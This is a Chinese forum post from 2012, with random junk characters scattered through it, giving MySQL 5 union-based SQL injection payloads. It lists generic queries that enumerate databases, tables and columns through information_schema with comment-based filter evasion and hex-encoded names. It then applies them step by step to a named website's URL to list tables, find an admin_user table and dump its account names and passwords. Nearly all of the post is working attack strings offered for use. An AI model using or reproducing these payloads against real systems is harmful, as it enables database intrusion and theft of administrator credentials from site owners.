查库
6 I, y, x: C' q4 @( [! W$ w
0 n' C) q k9 H9 F/ S' A/ xid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
- C& H5 ^7 P2 Z% q4 ?7 f7 E* d7 h! E, E& a+ N% R6 l1 D
查表
, a# g* k) o2 y1 W8 ?. b7 ?9 ?- R- K5 l }/ c8 ?/ J+ f0 O6 h
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1; m4 Q4 a5 l6 F- g& a
1 t5 x8 w* e" r$ N4 q) R查段4 ?( {8 O; u- w* T D( I7 Q' ]
5 [4 t) E, Q# U1 n' B
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1% d( t# u, L$ W& N
: g7 d: T9 Y9 S9 z8 H
4 Q, N2 y9 n% z1 Cmysql5高级注入方法暴表
) x) @ Y8 s# I0 P' H+ U) D$ `% a; {3 p+ [# N
例子如下:( |! N7 d" {( ~# x% p
4 z, [( C" m& a! B$ q! M% }
1.爆表
6 U( f: m6 r. b+ b$ Bhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
6 ]* _7 Y8 r" r" a/ _8 i这样爆到第4个时出现了admin_user表。7 F$ x3 }: S" D4 y+ }: h. T- M* S
J Q. d( \6 n; ?2.暴字段
; S; r# w7 r- m& Chttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
! h# w5 x5 z. r) I p% t6 n9 W
7 z' w/ ~+ o+ g) b! {3 ^7 C( p1 R. A
3.爆密码* X7 c3 W' @$ p. N" J
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* + r1 {8 L/ A* N
" `6 p/ z- F/ J. H/ C
) f; G8 I$ F9 R% t: t# H7 o |
发表于 2012-9-13 16:29:37
收藏
支持
反对